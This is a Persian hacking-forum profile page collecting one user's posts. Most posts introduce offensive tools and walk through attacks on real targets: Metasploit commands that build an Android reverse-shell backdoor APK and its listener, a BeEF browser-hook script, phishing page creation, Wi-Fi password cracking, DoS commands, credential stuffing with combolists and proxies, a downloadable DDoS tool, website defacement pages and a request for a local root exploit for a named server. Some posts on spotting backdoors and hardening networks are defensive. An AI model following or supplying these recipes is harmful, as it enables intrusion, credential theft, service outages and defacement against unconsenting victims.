-
ارسال ها
64 -
تاریخ عضویت
-
آخرین بازدید
-
روز های برد
15
نوع محتوا
پروفایل ها
تالارهای گفتگو
دانلودها
وبلاگها
تقویم
فروشگاه
گالری
پست ها ارسال شده توسط 6pish
-
-
معرفی ابزار تحت وب Recon-ng
recon-ng: ابزاری کاربردی جهت جمع آوری اطلاعات از دامین و سایر دامین های متصل به هم که از تکنیک های اولیه برای نفوذ به یک وبسایت یا سرور میباشد این ابزار با داشتن ماژول زیادی جهت جمع آوری اطلاعات از تارگیت مورد نظر در اختیار شما قرار میدهد.
1- تایپ عبارت recon-ng در ترمینال ابزار در محیط کامندی برای شما به نمایش در خواهد امد.
2- با دستور show modules کلیه ماژول ها برای شما لیست خواهد شد.
3- با انتخاب ماژول مورد نظر از دستور use استفاده کنید.مثال:(use recon/hosts-hosts/resolve)
4- ست کردن تارگیت مورد نظر با دستور set . مثال:( set google.com)
5- با دستور run اقدام به اغاز حمله خود کنید.
*** بعد از انجام مراحل بالا نتیجه کار برای شما نشان داده خواهد شد.
==> موفق باشید.
- واکنش ها : Trainer، RT3N، restive2 و 3 نفر دیگر
- 6
-
در در 1396/05/07, 00:17:55، black84 گفته است :
با سلام
بعضی از دوستان هستند که مخازن کالی رو اپدیت نکردن، که بدون اپدیت مخازن امکان نصب پکیج ها با دستورات apt-get میسر نیست به همین خاطر این توضیحات را ارائه کردم.
موفق باشید.
-
در در 1395/06/12, 03:28:35، z0002 گفته است :
سلام من از کالی رو اما apt-get update چیزی برام نمیاره و هر برنامه رو با این دستور دارم اجرا نمکنه ..چیکار کنم
با سلام خدمت عزیزان
مشکل شما نداشتن مخازن کالی هست ابتدا به مسیر زیر برید و فایل sources.list رو باز کنید و کد های زیر رو درون فایل کپی و ذخیره کنید اوکی میشه.
deb /wheezy main contrib non-free deb kali-dev main contrib non-free deb kali-dev main/debian-installer deb-src kali-dev main contrib non-free deb kali main contrib non-free deb kali main/debian-installer deb-src kali main contrib non-free deb kali/updates main contrib non-free deb-src kali/updates main contrib non-free deb kali-bleeding-edge main - واکنش ها : jen_avare، RT3N، Phoen1X و 1 نفر دیگر
- 4
-
در در 1395/07/20, 08:27:55، shahin040s گفته است :
با عرض سلام
دلیل به وجود اومدن این مشکل هنگام نصب کالی بوده باید از اول مراحل نصب را پیش برین تا برسین به قسمت install the system بعد از نصب باید در قسمت boot maneger پاسخ منفی بدین و پارتیشنی که از قبل کالی برای شما ایجاد کرده به نام boot با دستور زیر در قسمت boot maneger وارد کنید
/dev/sda بعد عددجلوی مربع میتونه 6 باشه یا 8 مشکل تون حل میشه
موفق باشید
-
در در 1395/09/22, 22:32:11، 3epehr گفته است :
ببخشید من یه مشگل در هک دارم وقتی فایل پیلودت رو میسازم باید سینکش کنم این کاروو میکنم ولی تو مرحله اخر که برنامه رو میدم به طرف نصب میکنه سریع اتصال من قطع میشه یعنی بعد 1 ثانیه . مشگل اینجاست که من کسی که تو شبکه اینترنتی خودم باشه مشگلی نداره و وصل میشه . ولی وقتی کسی که تو شبکه من نیست نصب میکنه بعد از 1 ثانیه قطع میشه
لطفا راهنمایی کنید
با سلام
دلیل کار نکردن پیلود شما در بیرون از شبکه داخلی تون به خاطر نداشتن یک ip ثابت یا همون استاتیک هست ...
برای رفع این مشکل شما میتونین از سرور مجازی تهیه کنید و از سرور اقدام به تست نفوذ کنید.
بعدام پیلود متاسپلویت روی بعضی از گوشی ها جوابگو نیست مخصوصا مدل های sony که به محض دسترسی به گوشی ابزارهای منیتی گوشی دسترسی شما را قط خواهد کرد.
آموزش تصویری را میتونید از لینک تاپیک زیر دریافت کنید...
http://guardiran.org/forums/topic/4692-معرفی-ابزار-های-کاربردی-کالی-لینوکس/?page=3
موفق باشد.
- واکنش ها : iranihacker، Phoen1X و DeMoN
- 2
- 1
-
معرفی ابزار امنیتی Metasploit
متاسپلویت ابزاری کاملا متن باز برای متخصصین امنیت شبکه میباشد که با استفاده از متاسپلویت میتوان از آسیب پذیری های سیستم ها را مورد تست نفوذ قرار داد.
و این ابزار به صورت دیفالت از اکسپلویت های مختلفی بهره میگیرد ولی شما هم میتوانید اکسپلویت های شخصی خود را در محیط متاسپلویت اظافه کنید.
--> با استفاده از متاسپلویت شما قادر خواهید بود ب ساخت backdoor اقدام به پیاده سازی حملات از جمله به گوشی های هوشمند اندروید، ویندوز و دیگر نرم افزار های کاربردی کنید.
==> با دستور زیر اقدام به بالا آوردن محیط کنسولی متاسپلویت کنید:
msfconsole
هنگامی که نیاز به ماژول خاصی مثل pdf داشتید با دستور زیر اقدام به جستجوی ماژول های لازم کنید:
show pdf
با ست کردن هر ماژول با هر مرحله آپشن های لازم را با دستور زیر برای شما نمایش داده خواهد شد:
show options
---> و در ادامه با ست کردن پیلود گوش دهنده meterpreter اقدام به شنود شبکه، دسترسی به webcam، shell و ... کنید.
**** آموزش تصویری حمله به گوشی های هوشمند اندروید + رهگیری نفوذگر پیوست شد.
-
در 12 ساعت قبل، k2020k گفته است :
با سلام
از این دستورات اقدام به ساخت فایل بک دور کنید: ...
تذکر: از این کامندی که شما اسکرین گرفتین ابتدا باید ip اصلی را وارد کنید و در مرحله دوم local ip را وارد کنید.
msfconsoleuse android/meterpreter/reverse_tcp
*set LHOST *your ip address
set LPORT 4444generate -t raw -f 6pish.apk
(تا این مرحله فایل بک دور به اسم 6pish.apk در مسیر root ساخته شد)
------------------------------------
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
*set LHSOT *local ip address
set LPORT 4444show options
exploit
(حالا فایل در پشتی آماده نصب در گوشی هوشمند تارگت هست تا شما بتونید به کلیه گوشی دسترسی بگیرید)
موفق باشید...
- واکنش ها : DeMoN، 0r0b4s، iranihacker و 5 نفر دیگر
- 7
- 1
-
معرفی ابزار xerosploit
ابزاری فوق العاده کاربردی برای کسانی که علاقه مند به حملات MITM هستند که این ابزار امکاناتی نظیر شنود پکت های درون شبکه , ربودن پسورد های درون شبکه و کلی امکانات دیگه.
این ابزار به صورت دیفالت روی کالی نصب نیست و شما با دستورات زیر میتونید اقدام به نصب ابزار در محیط ترمینال کنید:
apt-get update
apt-get upgrade
git clone https://github.com/LionSec/xerosploit cd xerosploit && sudo python install.py sudo xerosploit
با دستورات بالا ابزار برای شما نصب و در محیط کامندی اجرا خواهد شد.
موفق باشید
-
معرفی ابزار Text Finde
فیشینگ از جمله حملاتی است که سعی در بدست اوردن اطلاعات شخصی شما در فضای اینترنت می باشد و شما به بهره گیری از این ابزار اقدام در خواندن اطلاعات صفحات جعلی کنید.
سوال: کار این ابزار چیه؟
حالا شاید برای شما سوال باشه که این ابزار چیکار میتونه بکنه , این ابزار به زبان پایتون نوشته شده است و شما بعد از پیدا کردن صفحات جعلی اینترنتی اقدام به استخراج اطلاعات ذخیره شده با پسوند txt در وبسایت کنید و طلاعات ذخیره شده در صفحات جعلی را دانلود کنید.
موفق باشید.
**** فایل پیوست شد
پسورد فایل guardiran.org
-
در در 1396/01/30, 09:20:55، l8qp گفته است :
سلام
چند وقت پیش یه برنامه دانلود کردم که از طریق سی ام دی اجرا میشد و لیست یوزرنیم و پسورد رو میگرفت و اون ها رو تست می کرد
الان...میخوام بدونم چطوری میشه از طریق یه کنسول اپلیکیشن به یک سایت لاگین کرد یا پسورد و نام کاربری رو تست کرد...ممنون میشم راهنمایی کنید.
مثلا یه کرکر چطوری پسورد ها رو روی یک سایت تست میکنه.
لطفا کمک کنید
با سلام
شما میتونید با ابزار sentry mba اقدام به تست پسورد روی هر پیج لاگین چه سایت باشه چه اینستا و...
1. ابتدا باید کانفیگ اون سایت رو بدست بیارید
2. یه لیست پروکسی به نرم افزار بدید تا با هر بار تست پسورد از پروکسی استفاده کنه و ip شما را بلاک نکنه
3. میتونید از کمبولیست اقدام به تست کنید.
موفق باشید...
-
معرفی اکسپلویت DDOS Attack
این ابزار به زبان پایتون نوشته شده است که با این ابزار قدرتمند شما قادر خواهید بود حملات dos , ddos سنگین را علیه تارگیت خودتون انجام دهید
نکته: چنان چه این ابزار را در سرور های زامبی خود اجرا کنید و به یه تارگیت حمله کنید قادر هست سایت ها و سرور های بزرگ رو down کنه.
پسورد فایل: guardiran.org
-
بالا بردن امنیت در شبکه های کامپیوتری
امروزه خیلی از ماها از کامپیوتر های در یک رنج ip یا همون شبکه سروکار داریم چه در اداره جات چه در مدارس و دانشگاه ها و...
حالا امنیت 100 درصد نیست ولی باید امنیت را در حد قابل قبولی افزایش داد که در چند مورد خلاصه میکنم...
1. استفاده از سویچ در کنار روتر در شبکه که امنیت در مقابل شنود بسته های شبکه را چند درصدی افزایش میدهد.
2. پرهیز از استفاد کردن روتر های TPLINK و DLINK ترجیحا از روترهای سیسکو و میکروتیک استفاده شود، زیرا اکسپلویت های زیادی برای دور زدن پسورد این نوع روتر ها وجود داره که با بدست آوردن این پسورد هکر قادر خواهد بود تا به اطلاعات مهم شما دست پیدا کند و حملاتی از جمله مهندسی اجتماعی روی شبکه شما انجام دهد.
3. شاید شما از جمله افرادی باشید که از تلفن ، فکس ، دوربین مداربسته و پرینتر در یک شبکه استفاده میکنید که بنده توصیه نمی کنم زیرا هکر بعد از نفوذ به شبکه داخلی قادر خواهد بود تا تماسها ،فکس ها و اطلاعات پرنت شده و دوربین های مداربسته شما دست پیدا کند.
نکته امنیتی: 1. به صورت جداگانه در شبکه قرار بگیرند 2. قرار دادن این چهار دستگاه به پشت proxy
4. اجرا نکردن فایل های مشکوک که از منابع نامعلوم ارسال می شوند چه ابزار باشد چه یک فایل pdf حاوی اطلاعات شرکت یا ... ؛ هکر ها از این قبیل روش ها حملاتی از جمله مهندسی اجتماعی که قبلا از شبکه بدست آورده اند با این گونه فایل ها اقدام به گرفتن دسترسی به شبکه داخلی شما را دارند.
موفق و سربلند باشید.
-
معرفی ابزار scapy
ابزاری قدرتمند در زمینه تولید بسته ، اسکن شبکه و شنود بسته ها می باشد
با این ابزار شما میتونید در شبکه بسته تولید کنید و پاسخ بسته را دریافت کنید.
با این دستور بزار برای شما به نمایش در میاد..
scapy
موفق باشید...
- واکنش ها : restive2، Phoen1X، DeMoN و 5 نفر دیگر
- 8
-
با سلامی دوباره خدمت دوستان
امروز میخوام برای پیشگیری از قوع حمله هکری علیه ویندوز یکم توضیح بدم امیدوارم مطالب بنده حداقل بتونه چند درصدی علم شما را بالا ببره.
ما علاوه بر چک کردن پورت های باز و پروسس های فعال ابتدا برای پیشگیری باید به چند نکته توجه کنیم ...
1. خودداری از کلیک بر روی لینک های مشکوک بخصوص لینک هایی که به هر شکل مهندسی اجتماعی برای شما ارسال میشوند و مخصوصا لینک هایی که دارای ip هستند به شدت خودداری کنید
2.خودداری از نصب نرم افزار مشکوک و کم حجم که هکر ها با این ابزار ها قادر هستند داده های شما را مستقیم روی سرور هکر آپلود کنه که انتی ویروس ها قادر به شناسایی آن نیستند( هنگامی که ابزار مخربی را بعد از نصب متوجه شدین با خواندن سورس کد ابزار ip یا دیگر آدرس هکر با بیرون بکشید)
3. به هیچ عنوان ip ولید خود را در اختیار کسی قرار ندهید (هکر ها در کمین هستند)
-
اموزش قرار دادن تصویر در صفحه دیفیس
در اینجا شما با اظافه کردن تصویر در صفحات دیفیس اشنا خواهید شد.
<html>
<title>.:: HACKED ::.</title>
<br>
<body bgcolor = black>
<center> <h1> <font color= red>HA CK ED BY 6P I SH</font> </h1> </center>
<hr >
<center><img src =http://s8.picofile.com/file/8281613334/111111111.gif></center>
</body>
</html>
بقیه کد ها رو در بالا توضیح دادم میمونه کد پایین:
<hr> با این دستور گفتم یک خط مستقیم بزار
<center><img src =http://s8.picofile.com/file/8281613334/111111111.gif></center>
با دستور center گفتم چیزی که میخوای بزاری در وسط باشهبا دستور <img src =http://s8.picofile.com/file/8281613334/111111111.gif> گفتم یه فایل تصویری از مسیر روبرویی که گذاشتم دانلود کن و در وسط صفحه به نمایش در بیار.
موفق باشید
-
معرفی ابزار BeEF برای پیاده سازی حملات تحت وب
BeEF در دسته ابزار هایی قرار دارد که در تست نفوذ استفاده می شود و برای اجرای حملات کلاینت در مقابل مرورگر های پر کاربرد که قابل مدیریت کلاینت های متصل به هم باشند با استفاده از اسیب پذیری xss است که از لینک ساخته شده توسط ابزار که از زبان جاوا اسکریپت نوشته شده به محض کلیک هدف به این لینک قربانی برای شما در ابزار به نمایش در میاد که شما میتوانید به عنوان زامبی ازش استفاده کنید
نمونه لینک:
<script type=text/javascript src=http:// your - ip>:3000/hook.js></script>
*** با کلیک کردن قربانی به این لینک شما میتونید تمامی پسورد های ذخیره شده ای مرورگر قربانی و... رو از طریق کوکی های مرورگر هدف که توسط ابزار به شما ارسال شده است بدست بیارید.
نکته: ابزار کاملا با صفحه ای گرافیکی و زیباست که با اجرای این ابزار ابتدا از شما یوزرنیم و پسورد میخواد که هر دو beef می باشد.
موفق باشید
- واکنش ها : s.a.e.e.d، Phoen1X، DeMoN و 4 نفر دیگر
- 7
-
معرفی ابزار setoolkit برای ساخت صفحات تقلبی
setoolkit : ابزاری قدرتمند در زمینه ساخت صفحات جعلی و حملات روی ماشین ها و ایجاد دسترسی می باشد که در محیط کامندی ترمینال با وارد کردن اسم ابزار ،ابزار برای شما اجرا و اپشن های مربوطه برای استفاده ای شما نمایان خواهد شد و شما با انتخاب عددی اپشن مورد نظر عملیات خورد را آغاز کرده و بعد از وارد کردن ادرس سایت فایل index به همراه فایل txt که برای ذخیره اطلاعات وارد کرده قربانی میباشد در مسیر زیر برای شما ساخته خواهد شد.
var/www/html
نکته: چنان چه میخواهید فایل که سایت مورد نظر که فیک می باشد که خودتون ساختین با ست کردن ip لوکال خود درون ابزار و وارد کردن ip لوکال خودتون درون مرورگر سایت هدف برای شما باز خواهد شد .
نکته: چنان چه سایت مورد نظر در مرورگر بالا نیومد با دستو ر زیر آپاچی خود رو فعال کنید:
service apache2 start
و از دیگر امکانات جذابی که این ابزار داره میتونید با ست کردن روی متاسپلویت میتونید حملاتی نظیر ایجاد backdor روی سیستم عامل ها استفاده کنید و کلیه دسترسی ماشین قربانی را بدست بگیرید از جمله shell ، webcam و...
موفق باشید.
*** اموزش تصویری پیوست شد ***
پسورد فایل: guardiran.org
- واکنش ها : Trainer، restive2، RT3N و 3 نفر دیگر
- 6
-
معرفی ابزار مهم و کاربردی websploit
websploit ابزاری قدرتمند در زمینه حملات تحت وب از جمله این عملیات ها عبارتند از حملات تکذیب سرویس دهی (dos) ، پیداکردن صفحات لاگین ادمین، حملات علیه سرویس دهنده های وایرلس و بلوتوث و بسیاری از امکانات دیگر.
با دستور زیر اقدام به اجرای این ابزار مهم کنید:
websploit
با دستور زیر اقدام نمایش اپشن ها و ابزار های مود استفاده برای ایجاد حمله خود استفاده کنید:
show modules
با دستور زیر قدام به حمله کنید :(مثلاحملات dos)
use network/web killer
set TARGET site.com
run
نکته: به جای site.com تارگیت مورد نظر را وارد کنید.
موفق باشید.
*** فایل اموزش تصویری پیوست شد ***
پسورد فایل: guardiran.org
- واکنش ها : restive2، johnjones، RT3N و 2 نفر دیگر
- 5
-
معرف ابزار crunch
crunch یک ابزار قدرتمند در زمینه ساخت پسورد لیست میباشد که در محیط کامندی قابل اجرا می باشد و شما با این ابزار میتونید هم به صورت فایل ذخیره کنید و هم میتونید مستقیم با دستورات زیر اقدام به ساخت پسورد لیست و تست پسورد هم زمان به تارگیت خود کنید.
دستور ساخت فایل پسورد لیست در محیط کامندی ترمینال:
crunch 4 6 0123456789 -o /root/Desktop/guardiran.txt
شما با این دستور میتونید یه پسورد لیست کامل از اعداد داشته باشید که در دسکتاپ شما به صورت فایل txt به نام گارد ایران ذخیره خواهد شد.
دستور کرک فایل با crunch که نیاز به ساخت پسورد لیست نباشه و دیگه لازم نباشه شما پسورد لیست بسازین و مستقیم با این دستور عملیات کرک رو انجام بدین:
نکته : در دستور زیر airecrack رو مثال میزنم که برای کرک پسورد wifi دیگه لازم نباشه پسورد لیست بدین
)crunch 8 11 0123456789 | airecrack-ng /root/(file-name)01.cap -w - -e (wifi-name
موفق باشید
-
اینجا میخواهیم یه صفحه ساده html دیفیس درست کنیم که فقط روی صفحه متن باشه
اول کد ها رو ذکر می کنم و در پایین توضیحات کامل کد ها رو براتون میگم ...
<html>
<title>.:: HACKED ::.</title><br = 1>
<br = 2>
<br = 3>
<br = 4>
<br = 5>
<br = 6>
<br = 7>
<br = 8>
<body bgcolor = black><center> <h1> <font color= gren>Hacked By </font> </h1> </center>
<center> <h1> <font color= #ffffff>Guardiran Security Team</font> </h1> </center><center> <h1> <font color= red>Telegram.me/guardiran_org</font> </h1> </center>
</body>
</html>
حالا توضیحات خط به خط کد ها:
نکته : اسلش(/) در اینجا برعکس خورده ولی از اینجا کد ها رو در فایل txt کپی پیست کنید اونجا بهتر نشون میده و برای اجرا پسوند فایل رو به html تغییر دهید.
<html> : در زبان برنامه نویسی تقریبا 90 درصد دستوراتی رو که باز میکنیم باید در پایان دستور ببندیم حالا من در ابتدا یه <html> رو با دو تا تگ بزرگ و کوچیک باز کردم و در اخر با اسلش(/) بستم به این شکل(</html>
<title>.:: HACKED ::.</title> : با دستور title میگم تایتل سایت یا همون متنی که بالای تب مرورگر باز میشه این متن باشه .::HACKED::. و در اخر هم دستور رو بستم.
<br = 1>
<br = 2>
<br = 3>
<br = 4>
<br = 5>
<br = 6>
<br = 7>
<br = 8> : با این دستور گفتم 8 خط بیا پایین تر از صفحه تا من تغییرات لازم رو اعمال کنم.<body bgcolor = black> : با دستور body گفتم میخوام از اینجا شروع کنم به اعمال تغغرات گرافیکی صفحه و با دستور bgcolor = black گفتم رنک زمینه رو سیاه کن.
<center> با این دستور گفتم هر چی که تایپ میکنم رو در وسط صفحه قرار بده و با دستور <h1> گفتم سایز متن هامو بزرگ کن شما با تغییر عدد 1 میتونین سایز متن رو بزرگ و کوچیکتر کنین.
<font color= gren> : با این دستور گفتم رنگ این متن رو Hacked By سبز کن.
</font> </h1> </center> : و در اخر هر چی رو که باز کردم دوباره بستم.
<font color= #ffffff> : اینم یه دستور تغییر رنگ های مخصوص برنامه نویسی این رنگ سفید هست.
بقیه رو هم به همین صورت باز کردم و بستم و در اخر bodyو بعدش html رو بستم
امیدوارم مورد پسند شما واقعه شده باشه
موفق باشین
- واکنش ها : iranihacker، mohammadd، DeMoN و 4 نفر دیگر
- 6
- 1
-
-
شناسایی در پشتی یا (backdoor ) یا ویروس جاسوسی از طریق پورت باز شده مشکوک در ویندوز
در پشتی یا (backdoor ) چیست؟ به فرض مثال یه هکر با استفاده از یه ضعف در سیستم شما وارد سیستم شما شده و برای اینکه دیگه دردسر نفوذ دوباره به سیستم شما را نکشه و یا این که شما این ضعف رو رفع کردین هکر میاد بعد از نفوذش یه پورت روی سیستم شما باز میکنه و یه ابزار مخرب روی سیستم شما باز میکنه و اون ابزار رو با پورتی که باز کرده مچ میکنه هر وقت دلش خواست میتونه به سیستم شما لاگین کنه به این روش میگن درپشتی یا backdoor .
****در اینجا یاد میگیرید چجوری پورت های باز رو شناسایی و مانیتورینگ کنید تا پورتهایی که اخیرا باز شده اند رو شناسایی کنید.
برای مشاهده پورت های باز در محیط کامندی ویندوز(cmd) دستور زیر رو تایپ کنید:
netstat -ano
برای مانیتورینگ کردن پورت های باز دستور زیر رو تایپ کنید:(مانیتورینگ یعنی پورت های باز رو برای شما ذخیره میکنه)
netstat -ano 60 >d:/guardiran.txt
با زدن این دستور یه فایل txt به نام guardiran در درایو d شما ساخته میشه و هر 1 دقیقه پورت های باز شما رو در این فایل ذخیره میکنه
نکته: بستگی به خودتون داره میتونین زمان ذخیره پورت رو کم یا زیاد کنین فقط اینجا باید به ثانیه وارد کنید
موفق باشد.
-
شناسایی پروسس های فعال مخرب
در این جلسه ما روش شناسایی از طریق پروسس (Process ) های فعال آشنا میشیم
پروسس (System Process ) چیست؟ شامل یک سری برنامه هایی به صورت آشکار و پنهان می باشند که به دور از چشم کاربر در پس زمینه اجرا می شوند. هر بار که کامپیوتر روشن می گردد،
با کلید های ترکیبی ctrol+shifi+esc در ویندوز یک پنجره برای شما باز میشه و با رفتن به تب دوم یعنی Processes میتونید پروسس های فعال را اونجا مشاهده کنید.
** پرسش:
شاید این سوال برای شما پیش بیاد که چجوری بفهمیم کدوم فایل سیستمی هست و کدوم یکی مخرب؟؟
جواب : روش اول:
شما میتونین از جستجوی وب برای سناسایی فایل های مخرب و سیستمی استفاده کنید یعنی اسم پروسس را در گوگل سرچ کنید که فایل مخرب هست یا سیستمی.
روش دوم:
برای همین منظور من یک ابزار در زمینه شناسایی پروسس فعال پیوست میکنم که با نصب این نرم افزار و اجرای کاملا گرافیکی پروسس های مشکوک را به رنگ قرمز در میاره و راحت شناسایی میشن.
نحوه از کار انداختن پروسس های فعال:
ابتدا باید با کلید های کنترلی که بالا گفتم روی پروسس مربوطه کلیک کنید و با زدن گزینه End Process پروسس موقتا برای شما غیر فعال میشه و اگه در درایو c فایل اصلی این پروسس را پاک نکنید بعد از ریستارت کامپیوتر شما باز شروع به کار خواهد کرد.
مسیر هایی که پروسس های مخفی :
ابتدا فایل های خود را از حالت مخفی یا همون hidden files در بیارید تا همه ای فایل های مخفی برای شما نمایان شود و بعد با رفتن در مسیر های زیر اقدام به پیدا کردن فایل مخرب کنید
C:\Users\Default\AppData\Local
C:\ProgramData
این 2 مسیر هایی هستند که بیشتر فایل های مخرب اینجا خودشونو مخفی میکنند.
pass files: guardiran.org
-
با عرض سلام به همه ای اعضای محترم گارد ایران
دلیل این که این تاپیک رو شروع کردم اینه که متاسفانه ویروس های جاسوسی های زیادی هستند که انتی ویروس قادر به شناسایی شان نیست اسیب های جبران ناپذیری از جمله سرقت اطلاعات شخصی افرادی که از سیستم عامل ویندوز استفاده میکنند قادر به شناسایی این چنین ویروس هایی نیستند
و خیلی از عزیزانی که در زمینه هکینگ فعالیت میکنند به خاطر استفاده از ابزار هایی که سورس های مخربی دارند نمیتونند از انتی ویروس استفاده کنند در این تاپیک نیز به امنیت اطلاعات این عزیزان افزوده خواهد شد
امیدوارم از مطابی که گذاشته خواهد شد استقبال شود...
تاپیک درخواست لوکال روت ( درخواست localroot )
در باگ های امنیتی
ارسال شده در
با عرض سلام خدمت عزیزان
دوستان یه لوکال روت لازم داشتم از این کرنل:
Linux server1.myadeska.de 3.10.0-514.10.2.el7.x86_64 #1 SMP Fri Mar 3 00:04:05 UTC 2017 x86_64
فوری:)